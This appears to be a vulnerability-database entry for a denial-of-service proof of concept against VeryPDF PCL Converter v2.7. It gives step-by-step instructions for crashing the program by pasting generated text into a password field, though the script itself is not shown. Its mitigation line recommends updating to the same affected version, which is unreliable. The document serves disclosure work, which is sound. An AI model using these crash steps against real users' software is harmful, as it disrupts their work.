vendor:
VeryPDF PCL Converter
by:
Alejandra Sánchez
7.8
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: VeryPDF PCL Converter
Affected Version From: 2.7
Affected Version To: 2.7
Patch Exists: YES
Related CWE: N/A
CPE: a:verypdf:verypdf_pcl_converter
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Windows 10
2019
VeryPDF PCL Converter v2.7 – Denial of Service (PoC)
VeryPDF PCL Converter v2.7 is vulnerable to a denial of service attack when a maliciously crafted file is used as input. An attacker can exploit this vulnerability by running the python script 'PCLConverter.py', which will create a new file 'PCLConverter.txt'. The attacker then needs to copy the text from the generated PCLConverter.txt file to clipboard, open VeryPDF PCL Converter v2.7, go to 'Setting' > 'PDF Security', mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and click 'OK'. Finally, the attacker needs to click on 'Add File(s)', select a pcl file, e.g. 'sample.pcl' and click on 'Start', which will cause a crash.
Mitigation:
Update to the latest version of VeryPDF PCL Converter v2.7
